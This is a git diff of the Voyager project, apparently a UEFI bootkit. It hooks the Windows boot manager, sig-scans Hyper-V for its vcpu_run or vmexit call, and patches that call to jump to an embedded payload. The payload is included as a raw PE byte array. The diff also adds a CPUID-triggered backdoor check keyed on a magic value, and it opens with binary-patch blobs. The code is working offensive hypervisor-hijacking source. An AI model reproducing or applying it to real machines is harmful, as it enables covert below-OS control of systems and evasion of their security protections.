z84Nm;g>v>0%W=;R^k?V#_hg5U^qO;6tNB(?Z%;1OGx~uIf=fDSVpX_fW>YN%E2n1^sgKQnr?e-EGR9~;4>Ae?z8 zfoOLhCpbFsKzc5{KaCCUB({6#MWvsHw^zdPT0_nBe9H zXLB=#t-Id&lx2_S;PSyE3gsgD4KkfXCdbVW=63DM+za|bs%JL8r$4>hkNdy_y>FmD zh(RA3-L}-*h=c0Qe0J8b%Z2iE@65KwYd$ob>M?EGvTd_s*)E!nZj08QN0&8=sh-@V z!*`!)sIAXLf3~KpS*F5LhUo2X)Fvp7F z7O?hz^vG%4Qs8mJfpIPQ8vI+~whxx2DLHjfTQ~mwCca zpi-u9AS@WCD4GBB(AEz@%JXxP#iRK=PFI@fbxpL)|EC4UnsvAlAa*W_wXercqzU!N z=d8!u5QlSPnHT92^I>AL#(WB;AnQx^vldJx)m?8+nqDV8y|d4zZOFTd6wiOt_TYR{ z(YnI<+VH|;%mud1_Rv9gE>3rnosZL)-#r zFFdYNq@W~yg=4@S$kVtMOZDEGSfBik$ogEw9)kZsLwl%`o;_TGudPV$wOpmD+tspe z*9^b?zW!(MXQ^G&OP(7`eG-3{gyW_^UNp)*FJ-~F%5s_iFZ2JyF;3?H`_Bw~?@SZB z;Pn5olKKDF7Rt%@Grg8;aEk1E*K3*6?Twy`$P#ARVtk6t!N&i6HE&Gw{Vd{Z0PcT$ zu2RV;;}cRIH2c!l0>6vz;Rmv%W$)n$vL$UoOYv;xKR@udhBWMk$9$geANRW`^Z(79 z2_4!=UOtzCGVDR-|3_cM@NiJ~^~v9`*ybK?vN@&?Be1W}M>)n3uI-9s{yPcFx~RQN zLwp2jIUYkC`f%quLSLWk*Yhao=QdqFx8k+S%fY*+jP1-FOdjRQ z$h`HqA0zUPWkLMriQO!cLl6)I1OY)n5D)|e0YN|z5CjAPK|l}?1a3qG*r(qJ!eNA$ zu=gJyuYkD$@m0Liv%kM~1YSC^8iCWVMd0-ra0!O>$Z`k*f`A|(2nYg#fFK|U2m*qD uARq_`0)oJejsW{?lS2>?1Ox#=KoAfF1OY)n5D)|e0YN|z5ClHn2>cIDKg)ao diff --git a/Voyager-1/PayLoad/x64/Release/vmexit_handler.obj b/Voyager-1/PayLoad/x64/Release/vmexit_handler.obj deleted file mode 100644 index ba442976ccd6bb4d3b4bf10f3dbef99b19376c88..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2743 zcmb7GZ){Ul6hCiojBbqCj*UM~pkN^*jMCv;MkV2Obo!8vE~CRio^)ONSfA@Z+Sk#+ zR3e517YP1~@q^Lu!Ds@0AR!DB`4dgVFUC*!C!&NzLy&+dA54_Y-+Aw~Yw?5GN$)-9 z{O&pT-Fxo2wSn?sebm`%Jv|;R7%r$1s$Lo{q*oV2_P;r_Vgx4&a zB4+G28XwJdb`&9!A>Db%j_R;yr*pl(=V{+SAQafz?Olm(OK)gpB^V6&xBGf~b^z`f z>(;3BbR(6^buWMKOBIAK{B&HNPJCuGkp+<75GL}>enjVfvQn7@Zb*G14 zATMol2oljZw18UZ+&(JtUM-qU=hAz1XKVi&XE38{N$r4^8gXt(Co>xSsgYccaCj^l zj_7(;8_w%$j+%hQ)kFrHD?@95M)U+R&*>a>-d7_st%II1_65}-&a4Ks_t0wX2E<+E z%IPs`v=5dBD}-(b*5Ggq0d&DXC|EHz&^S;Lc^ee+snJw=e~KQ3Eoar^XhFgHOcv2f zr|=br!^vaDJR^BEr-!rZh?diF0MtxkY2{v6b)$ir;p71~CsYe+G@MXVWCz?;g0otN zst}C^+UR(fy+CX5l`0Bi&Oe|P49x5}CQN*r5{5)HkLVD`X+C%h_yX`%;7#D`z!!q^ ziWY-!2VV-#5nBd6489!v0Jsx;0(><%$9xSqpUqoncCtCzu&PpKk^{(UAjQND>sWxz z(ZWzT*}kF6uwb8=bf!hH;LTN@AzXPjj%~&|B0&5}j$B?#=@~t1&Cf_qJD@_n50P&p zQitrqU)if~d^G%X{q7ZuuAch%!yY31fVZ4j6(4=m{!jgxRhy=kp8AF8MFYR~{>^XK z9;y+)AMfm~p8GZe`zP=zwAo**%I&zLnGE^8%5z#OmfoLpZqxLf((X~VrlN^_Ooiz7 zxZ5{+I@;YHWi+Wov$~RuBogVUJ3d>#LNbZ)WVIAr`K)YcH572HM=Yxm7}n>J&64Wq zlM;5Og#B8=Zj~^kpXFO^Np&P24Y};{(SXY)AHF>(Px@U$@+45d%Q;o$CwipdceTog zCtR&{`5+HF<@0whoc@WMyivC0y(ai2-I=~bQ_JF}OV?Drl2 zm?77q7h#R}#gN#SZG_vahA4-r(n0mZk(xM#+<=J5?Pq&j2HJ=EO1n~oubSyv--WNXb)NYB;HS?ox&5FcY@+x#jN%n{Yq4|t z<_Oc%ynAV{8qwVz&k3SSCQ@ES@E$~g>j%(71;iysWZYEUS3_WttjxhF(prZ)@n-JZ?HtehRSOVP9)Qd zXS{bke$z4qi(8^$L+-N5g9{x|DEk0(UOf}PnM`a`RZ&lIxgZK{296F?Lp*nR4Pt{X z3Naq6Aa_~)VPvTwSB$fA5p8qjBP2aOhvt1}( - reinterpret_cast(&vcpu_run) - - svm::voyager_context.vcpu_run_rva)(context); + svm::pgs_base_struct result = + reinterpret_cast( + reinterpret_cast(&vcpu_run) - + svm::voyager_context.vcpu_run_rva)(context); __svm_stgi(); + DBG_PRINT("after vcpu_run\n"); // gs:0 + 0x103B0 ] + 0x198 ] + 0xE80 ] = pointer to vmcb... auto vmcb = *reinterpret_cast( *reinterpret_cast( - reinterpret_cast( - result->pvcpu_context) + 0x198) + 0xE80); + *reinterpret_cast( + __readgsqword(0) + 0x103B0) + 0x198) + 0xE80); if (vmcb->exitcode == VMEXIT_CPUID && context->rcx == VMEXIT_KEY) { diff --git a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c index 8cd770f..17141bf 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c +++ b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c @@ -138,8 +138,8 @@ EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) if (EFI_ERROR((Result = gBS->HandleProtocol(BootMgfwPath, &gEfiLoadedImageProtocolGuid, (VOID**)&BootMgfw)))) return Result; - Print(L"Image Base -> 0x%p\n", BootMgfw->ImageBase); - Print(L"Image Size -> 0x%x\n", BootMgfw->ImageSize); + DBG_PRINT("Image Base -> 0x%p\n", BootMgfw->ImageBase); + DBG_PRINT("Image Size -> 0x%x\n", BootMgfw->ImageSize); VOID* ArchStartBootApplication = FindPattern( BootMgfw->ImageBase, @@ -148,10 +148,7 @@ EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) START_BOOT_APPLICATION_MASK ); - if (!ArchStartBootApplication) - return EFI_ABORTED; - - DBG_PRINT(L"ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication); + DBG_PRINT("ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication); MakeShitHook(&BootMgfwShitHook, ArchStartBootApplication, &ArchStartBootApplicationHook, TRUE); return Result; } @@ -181,6 +178,7 @@ EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, } else { + DBG_PRINT("some signature for winload found nothing (0), aborting...\n"); Print(L"nullptr detected, aborting...\n"); Print(L"Please submit a screenshot of this...\n"); } diff --git a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.c b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.c similarity index 60% rename from Voyager-2/Voyager-2 (2004-1709)/Hvix64.c rename to Voyager-2/Voyager-2 (2004-1709)/Hvax64.c index 27bbba9..b06f0b5 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.c +++ b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.c @@ -1,6 +1,6 @@ -#include "Hvix64.h" +#include "Hvax64.h" -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase) { if (!VoyagerData || !ImageBase) return NULL; @@ -44,7 +44,7 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) { if (AsciiStrStr(VoyagerData->ModuleBase + Name[i], "voyager_context")) { - *(voyager_t*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; + *(VOYAGER_T*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; break; // DO NOT REMOVE? #Stink Code 2020... } } @@ -91,69 +91,52 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) VOID MakeVoyagerData ( - pvoyager_t VoyagerData, + PVOYAGER_T VoyagerData, VOID* HypervAlloc, UINT64 HypervAllocSize, VOID* PayLoadBase, UINT64 PayLoadSize ) { - if (!VoyagerData || !HypervAlloc || !HypervAllocSize || !PayLoadBase || !PayLoadSize) - return; - VoyagerData->HypervModuleBase = HypervAlloc; VoyagerData->HypervModuleSize = HypervAllocSize; VoyagerData->ModuleBase = PayLoadBase; VoyagerData->ModuleSize = PayLoadSize; - VOID* VmExitHandler = + VOID* VCpuRunCall = FindPattern( HypervAlloc, HypervAllocSize, - VMEXIT_HANDLER_SIG, - VMEXIT_HANDLER_MASK + VCPU_RUN_HANDLER_SIG, + VCPU_RUN_HANDLER_MASK ); - /* - .text:FFFFF80000237436 mov rcx, [rsp+arg_18] ; rcx = pointer to stack that contians all register values - .text:FFFFF8000023743B mov rdx, [rsp+arg_28] - .text:FFFFF80000237440 call vmexit_c_handler ; RIP relative call - .text:FFFFF80000237445 jmp loc_FFFFF80000237100 - */ - - UINT64 VmExitHandlerCall = ((UINT64)VmExitHandler) + 19; // + 19 bytes to -> call vmexit_c_handler - UINT64 VmExitHandlerCallRip = (UINT64)VmExitHandlerCall + 5; // + 5 bytes because "call vmexit_c_handler" is 5 bytes - UINT64 VmExitFunction = VmExitHandlerCallRip + *(INT32*)((UINT64)(VmExitHandlerCall + 1)); // + 1 to skip E8 (call) and read 4 bytes (RVA) - VoyagerData->VmExitHandlerRva = ((UINT64)PayLoadEntry(PayLoadBase)) - (UINT64)VmExitFunction; + UINT64 VCpuRunCallRip = (UINT64)VCpuRunCall + 5; // + 5 bytes because "call vmexit_c_handler" is 5 bytes + UINT64 VCpuRunFunction = VCpuRunCallRip + *(INT32*)((UINT64)VCpuRunCall + 1); // + 1 to skip E8 (call) and read 4 bytes (RVA) + VoyagerData->VCpuRunHandlerRVA = ((UINT64)PayLoadEntry(PayLoadBase)) - VCpuRunFunction; + + DBG_PRINT("VCpuRunCallRip -> 0x%p\n", VCpuRunCallRip); + DBG_PRINT("VCpuRunFunction -> 0x%p\n", VCpuRunFunction); + DBG_PRINT("VoyagerData->VCpuRunHandlerRVA -> 0x%p\n", VoyagerData->VCpuRunHandlerRVA); } -VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook) +VOID* HookVCpuRun(VOID* HypervBase, VOID* HypervSize, VOID* VCpuRunHook) { - if (!HypervBase || !HypervSize || !VmExitHook) - return NULL; - - VOID* VmExitHandler = + VOID* VCpuRunCall = FindPattern( HypervBase, HypervSize, - VMEXIT_HANDLER_SIG, - VMEXIT_HANDLER_MASK + VCPU_RUN_HANDLER_SIG, + VCPU_RUN_HANDLER_MASK ); - if (!VmExitHandler) - return NULL; + UINT64 VCpuRunCallRip = (UINT64)VCpuRunCall + 5; // + 5 bytes to next instructions address... + UINT64 VCpuRunFunction = VCpuRunCallRip + *(INT32*)((UINT64)VCpuRunCall + 1); // + 1 to skip E8 (call) and read 4 bytes (RVA) + INT32 NewVCpuRunRVA = ((INT64)VCpuRunHook) - VCpuRunCallRip; + *(INT32*)((UINT64)VCpuRunCall + 1) = NewVCpuRunRVA; - /* - .text:FFFFF80000237436 mov rcx, [rsp+arg_18] ; rcx = pointer to stack that contians all register values - .text:FFFFF8000023743B mov rdx, [rsp+arg_28] - .text:FFFFF80000237440 call vmexit_c_handler ; RIP relative call - .text:FFFFF80000237445 jmp loc_FFFFF80000237100 - */ - - UINT64 VmExitHandlerCall = ((UINT64)VmExitHandler) + 19; // + 19 bytes to -> call vmexit_c_handler - UINT64 VmExitHandlerCallRip = (UINT64)VmExitHandlerCall + 5; // + 5 bytes because "call vmexit_c_handler" is 5 bytes - UINT64 VmExitFunction = VmExitHandlerCallRip + *(INT32*)((UINT64)(VmExitHandlerCall + 1)); // + 1 to skip E8 (call) and read 4 bytes (RVA) - INT32 NewVmExitRVA = ((INT64)VmExitHook) - VmExitHandlerCallRip; - *(INT32*)((UINT64)(VmExitHandlerCall + 1)) = NewVmExitRVA; - return VmExitFunction; + DBG_PRINT("VCpuRunCallRip -> 0x%p\n", VCpuRunCallRip); + DBG_PRINT("VCpuRunFunction -> 0x%p\n", VCpuRunFunction); + DBG_PRINT("NewVCpuRunRVA -> 0x%p\n", NewVCpuRunRVA); + return VCpuRunFunction; } \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/Hvax64.h b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.h new file mode 100644 index 0000000..6d4a97c --- /dev/null +++ b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.h @@ -0,0 +1,35 @@ +#pragma once +#include "PayLoad.h" + +#if WINVER == 2004 +#define VCPU_RUN_HANDLER_SIG "\xE8\x00\x00\x00\x00\x0F\x01\xDC" +#define VCPU_RUN_HANDLER_MASK "x????xxx" +#endif + +static_assert(sizeof(VCPU_RUN_HANDLER_SIG) == sizeof(VCPU_RUN_HANDLER_MASK), "signature does not match mask size!"); + +// +// AllocBase is the base address of the extra memory allocated below where hyper-v is +// AllocSize is the size of the extra allocated memory... This size == module size... +// +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase); + +// +// sig scan hv.exe for vmexit call and replace the relative call (RVA) with +// an RVA to the vmexit handler hook (which is the golden records entry point)... +// +// returns a pointer to the original vmexit function address... +// +VOID* HookVCpuRun(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook); + +// +// creates a structure with all the data needed to be passed to the golden record... +// +VOID MakeVoyagerData +( + PVOYAGER_T VoyagerData, + VOID* HypervAlloc, + UINT64 HypervAllocSize, + VOID* PayLoadBase, + UINT64 PayLoadSize +); \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.h b/Voyager-2/Voyager-2 (2004-1709)/Hvix64.h deleted file mode 100644 index 0eed407..0000000 --- a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.h +++ /dev/null @@ -1,54 +0,0 @@ -#pragma once -#include "PayLoad.h" - -#if WINVER == 2004 -#define VMEXIT_HANDLER_SIG "\x65\xC6\x04\x25\x6D\x00\x00\x00\x00\x48\x8B\x4C\x24\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxxxxxxxxxxx?xxxx?x????x" -#elif WINVER == 1909 -#define VMEXIT_HANDLER_SIG "\x48\x8B\x4C\x24\x00\xEB\x07\xE8\x00\x00\x00\x00\xEB\xF2\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxx?xxx????xxxxxx?x????x" -#elif WINVER == 1903 -#define VMEXIT_HANDLER_SIG "\x48\x8B\x4C\x24\x00\xEB\x07\xE8\x00\x00\x00\x00\xEB\xF2\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxx?xxx????xxxxxx?x????x" -#elif WINVER == 1809 -#define VMEXIT_HANDLER_SIG "\x48\x8B\x4C\x24\x00\xEB\x07\xE8\x00\x00\x00\x00\xEB\xF2\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxx?xxx????xxxxxx?x????x" -#elif WINVER == 1803 -#define VMEXIT_HANDLER_SIG "\xF2\x80\x3D\xFC\x12\x46\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxxxxx?xx????xxxx?x????x" -#elif WINVER == 1709 -#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\x78\x0A\x47\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x" -#elif WINVER == 1703 -#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\x74\xCC\x47\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9" -#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x" -#endif - -static_assert(sizeof(VMEXIT_HANDLER_SIG) == sizeof(VMEXIT_HANDLER_MASK), "signature does not match mask size!"); -static_assert(sizeof(VMEXIT_HANDLER_SIG) == 26, "signature is invalid length!"); - -// -// AllocBase is the base address of the extra memory allocated below where hyper-v is -// AllocSize is the size of the extra allocated memory... This size == module size... -// -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase); - -// -// sig scan hv.exe for vmexit call and replace the relative call (RVA) with -// an RVA to the vmexit handler hook (which is the golden records entry point)... -// -// returns a pointer to the original vmexit function address... -// -VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook); - -// -// creates a structure with all the data needed to be passed to the golden record... -// -VOID MakeVoyagerData -( - pvoyager_t VoyagerData, - VOID* HypervAlloc, - UINT64 HypervAllocSize, - VOID* PayLoadBase, - UINT64 PayLoadSize -); \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c index 35bca80..b2bdcd8 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c +++ b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c @@ -44,18 +44,18 @@ unsigned char PayLoad[3072] = 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5D, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, 0x52, 0x69, 0x63, 0x68, 0x6B, 0xDE, 0x5F, 0x8E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x05, 0x00, - 0x13, 0xB9, 0x72, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x91, 0x48, 0x75, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x00, 0x22, 0x20, 0x0B, 0x02, 0x0E, 0x1B, 0x00, 0x02, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x60, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0xD4, 0x8A, 0x00, 0x00, + 0x00, 0x60, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0xD4, 0x9E, 0x00, 0x00, 0x01, 0x00, 0x60, 0x01, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, @@ -66,10 +66,10 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, - 0xA2, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, + 0x50, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x1C, 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, + 0x74, 0x61, 0x00, 0x00, 0x34, 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, @@ -79,7 +79,7 @@ unsigned char PayLoad[3072] = 0x0C, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, + 0x74, 0x61, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, @@ -113,20 +113,35 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, - 0x24, 0x08, 0x48, 0x83, 0xEC, 0x58, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, - 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0xB8, 0x02, 0x44, 0x00, 0x00, - 0x0F, 0x78, 0x44, 0x24, 0x28, 0x48, 0x83, 0x7C, 0x24, 0x28, 0x0A, 0x75, - 0x4F, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, - 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x48, 0x08, 0x75, 0x3A, 0x48, 0x8B, - 0x44, 0x24, 0x20, 0x48, 0xC7, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0xB8, 0x1E, - 0x68, 0x00, 0x00, 0x0F, 0x78, 0x44, 0x24, 0x38, 0xB8, 0x0C, 0x44, 0x00, - 0x00, 0x0F, 0x78, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x44, 0x24, 0x30, 0x48, - 0x8B, 0x4C, 0x24, 0x38, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0xB9, 0x1E, - 0x68, 0x00, 0x00, 0x0F, 0x79, 0xC8, 0xEB, 0x21, 0x48, 0x8D, 0x05, 0x7D, - 0xFF, 0xFF, 0xFF, 0x48, 0x2B, 0x05, 0x76, 0x1F, 0x00, 0x00, 0x48, 0x89, - 0x44, 0x24, 0x40, 0x48, 0x8B, 0x54, 0x24, 0x68, 0x48, 0x8B, 0x4C, 0x24, - 0x60, 0xFF, 0x54, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x58, 0xC3, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x56, 0x48, 0x83, + 0xEC, 0x20, 0x48, 0x8B, 0xD9, 0x48, 0x8D, 0x35, 0x0C, 0x01, 0x00, 0x00, + 0xB9, 0x11, 0x00, 0x00, 0x00, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0xF3, 0x6E, + 0x0F, 0x01, 0xDD, 0x48, 0x8D, 0x05, 0xD6, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, + 0xCB, 0x48, 0x2B, 0x05, 0xCC, 0x1F, 0x00, 0x00, 0xFF, 0xD0, 0x4C, 0x8B, + 0xC0, 0x0F, 0x01, 0xDC, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x35, + 0xF8, 0x00, 0x00, 0x00, 0xB9, 0x10, 0x00, 0x00, 0x00, 0xF3, 0x6E, 0x65, + 0x48, 0x8B, 0x14, 0x25, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8A, 0xB0, + 0x03, 0x01, 0x00, 0x48, 0x8B, 0x91, 0x98, 0x01, 0x00, 0x00, 0x48, 0x8B, + 0x8A, 0x80, 0x0E, 0x00, 0x00, 0xE9, 0x8D, 0x00, 0x00, 0x00, 0x48, 0xB8, + 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x43, 0x08, + 0x0F, 0x85, 0x84, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x81, 0xC8, 0x00, 0x00, + 0x00, 0x48, 0x8D, 0x35, 0x8C, 0x00, 0x00, 0x00, 0x48, 0x89, 0x81, 0x78, + 0x05, 0x00, 0x00, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0x48, 0xC7, 0x81, 0xF8, + 0x05, 0x00, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0xB9, 0x11, 0x00, 0x00, 0x00, + 0xF3, 0x6E, 0x0F, 0x01, 0xDD, 0x48, 0x8D, 0x05, 0x44, 0xFF, 0xFF, 0xFF, + 0x48, 0x8B, 0xCB, 0x48, 0x2B, 0x05, 0x3A, 0x1F, 0x00, 0x00, 0xFF, 0xD0, + 0x4C, 0x8B, 0xC0, 0x0F, 0x01, 0xDC, 0xBA, 0xF8, 0x02, 0x00, 0x00, 0x48, + 0x8D, 0x35, 0x66, 0x00, 0x00, 0x00, 0xB9, 0x10, 0x00, 0x00, 0x00, 0xF3, + 0x6E, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, + 0x88, 0xB0, 0x03, 0x01, 0x00, 0x48, 0x8B, 0x81, 0x98, 0x01, 0x00, 0x00, + 0x48, 0x8B, 0x88, 0x80, 0x0E, 0x00, 0x00, 0x48, 0x83, 0x79, 0x70, 0x72, + 0x0F, 0x84, 0x68, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x49, + 0x8B, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, + 0xCC, 0xCC, 0xCC, 0xCC, 0x62, 0x65, 0x66, 0x6F, 0x72, 0x65, 0x20, 0x76, + 0x63, 0x70, 0x75, 0x5F, 0x72, 0x75, 0x6E, 0x0A, 0x00, 0xCC, 0xCC, 0xCC, + 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, + 0x61, 0x66, 0x74, 0x65, 0x72, 0x20, 0x76, 0x63, 0x70, 0x75, 0x5F, 0x72, + 0x75, 0x6E, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, @@ -141,47 +156,32 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 